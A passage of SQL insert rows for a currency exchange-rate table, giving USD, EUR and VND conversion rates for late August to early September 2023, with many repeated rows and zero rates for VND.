(8388, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8389, 1, 'USD', 0.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8390, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8391, 2, 'EUR', 0.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8392, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8393, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8394, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8395, 1, 'USD', 1.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8396, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8397, 2, 'EUR', 1.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8398, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8399, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8400, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8401, 1, 'USD', 0.000000, 2, 'EUR', 0.922510, '2023-08-25'),
(8402, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8403, 2, 'EUR', 0.000000, 1, 'USD', 1.084000, '2023-08-25'),
(8404, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-25'),
(8405, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-25'),
(8406, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-25'),
(8407, 1, 'USD', 1.000000, 2, 'EUR', 0.922510, '2023-08-26'),
(8408, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8409, 2, 'EUR', 1.000000, 1, 'USD', 1.084000, '2023-08-26'),
(8410, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8411, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8412, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8413, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8414, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8415, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8416, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8417, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8418, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8419, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8420, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8421, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8422, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8423, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8424, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8425, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8426, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8427, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8428, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8429, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8430, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8431, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8432, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8433, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8434, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8435, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8436, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8437, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8438, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8439, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8440, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8441, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8442, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8443, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8444, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8445, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8446, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8447, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8448, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8449, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-26'),
(8450, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8451, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-26'),
(8452, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-26'),
(8453, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-26'),
(8454, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-26'),
(8455, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8456, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8457, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8458, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8459, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8460, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8461, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8462, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8463, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8464, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8465, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8466, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8467, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8468, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8469, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8470, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8471, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8472, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8473, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8474, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8475, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8476, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8477, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8478, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8479, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8480, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8481, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8482, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8483, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8484, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8485, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8486, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8487, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8488, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8489, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8490, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8491, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8492, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8493, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8494, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8495, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8496, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8497, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-27'),
(8498, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8499, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-27'),
(8500, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-27'),
(8501, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-27'),
(8502, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-27'),
(8503, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8504, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8505, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8506, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8507, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8508, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8509, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8510, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8511, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8512, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8513, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8514, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8515, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8516, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8517, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8518, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8519, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8520, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8521, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8522, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8523, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8524, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8525, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8526, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8527, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8528, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8529, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8530, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8531, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8532, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8533, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8534, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8535, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8536, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8537, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8538, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8539, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8540, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8541, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8542, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8543, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8544, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8545, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-28'),
(8546, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8547, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-28'),
(8548, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-28'),
(8549, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-28'),
(8550, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-28'),
(8551, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8552, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8553, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8554, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8555, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8556, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8557, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8558, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8559, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8560, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8561, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8562, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8563, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8564, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8565, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8566, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8567, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8568, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8569, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8570, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8571, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8572, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8573, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8574, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8575, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8576, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8577, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8578, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8579, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8580, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8581, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8582, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8583, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8584, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8585, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8586, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8587, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8588, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8589, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8590, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8591, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8592, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8593, 1, 'USD', 0.000000, 2, 'EUR', 0.925240, '2023-08-29'),
(8594, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8595, 2, 'EUR', 0.000000, 1, 'USD', 1.080800, '2023-08-29'),
(8596, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-29'),
(8597, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-29'),
(8598, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-29'),
(8599, 1, 'USD', 1.000000, 2, 'EUR', 0.925240, '2023-08-30'),
(8600, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8601, 2, 'EUR', 1.000000, 1, 'USD', 1.080800, '2023-08-30'),
(8602, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8603, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8604, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8605, 1, 'USD', 0.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8606, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8607, 2, 'EUR', 0.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8608, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8609, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8610, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8611, 1, 'USD', 1.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8612, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8613, 2, 'EUR', 1.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8614, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8615, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8616, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8617, 1, 'USD', 0.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8618, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8619, 2, 'EUR', 0.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8620, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8621, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8622, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8623, 1, 'USD', 1.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8624, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8625, 2, 'EUR', 1.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8626, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8627, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8628, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8629, 1, 'USD', 0.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8630, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8631, 2, 'EUR', 0.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8632, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8633, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8634, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8635, 1, 'USD', 1.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8636, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8637, 2, 'EUR', 1.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8638, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8639, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8640, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8641, 1, 'USD', 0.000000, 2, 'EUR', 0.925670, '2023-08-30'),
(8642, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8643, 2, 'EUR', 0.000000, 1, 'USD', 1.080300, '2023-08-30'),
(8644, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-30'),
(8645, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-30'),
(8646, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-30'),
(8647, 1, 'USD', 1.000000, 2, 'EUR', 0.925670, '2023-08-31'),
(8648, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8649, 2, 'EUR', 1.000000, 1, 'USD', 1.080300, '2023-08-31'),
(8650, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8651, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8652, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8653, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8654, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8655, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8656, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8657, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8658, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8659, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8660, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8661, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8662, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8663, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8664, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8665, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8666, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8667, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8668, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8669, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8670, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8671, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8672, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8673, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8674, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8675, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8676, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8677, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8678, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8679, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8680, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8681, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8682, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8683, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8684, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8685, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8686, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8687, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8688, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8689, 1, 'USD', 0.000000, 2, 'EUR', 0.918610, '2023-08-31'),
(8690, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8691, 2, 'EUR', 0.000000, 1, 'USD', 1.088600, '2023-08-31'),
(8692, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-08-31'),
(8693, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-08-31'),
(8694, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-08-31'),
(8695, 1, 'USD', 1.000000, 2, 'EUR', 0.918610, '2023-09-01'),
(8696, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8697, 2, 'EUR', 1.000000, 1, 'USD', 1.088600, '2023-09-01'),
(8698, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8699, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8700, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8701, 1, 'USD', 0.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8702, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8703, 2, 'EUR', 0.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8704, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8705, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8706, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8707, 1, 'USD', 1.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8708, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8709, 2, 'EUR', 1.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8710, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8711, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8712, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8713, 1, 'USD', 0.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8714, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8715, 2, 'EUR', 0.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8716, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8717, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8718, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8719, 1, 'USD', 1.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8720, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8721, 2, 'EUR', 1.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8722, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8723, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8724, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8725, 1, 'USD', 0.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8726, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8727, 2, 'EUR', 0.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8728, 2, 'EUR', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8729, 3, 'VND', 0.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8730, 3, 'VND', 0.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8731, 1, 'USD', 1.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8732, 1, 'USD', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8733, 2, 'EUR', 1.000000, 1, 'USD', 1.086800, '2023-09-01'),
(8734, 2, 'EUR', 1.000000, 3, 'VND', 0.000000, '2023-09-01'),
(8735, 3, 'VND', 1.000000, 1, 'USD', 0.000000, '2023-09-01'),
(8736, 3, 'VND', 1.000000, 2, 'EUR', 0.000000, '2023-09-01'),
(8737, 1, 'USD', 0.000000, 2, 'EUR', 0.920130, '2023-09-01'),
(8738, 1, 'USD', 0.000000, 3, 'VND', 0.000000, '2023-09-01'),
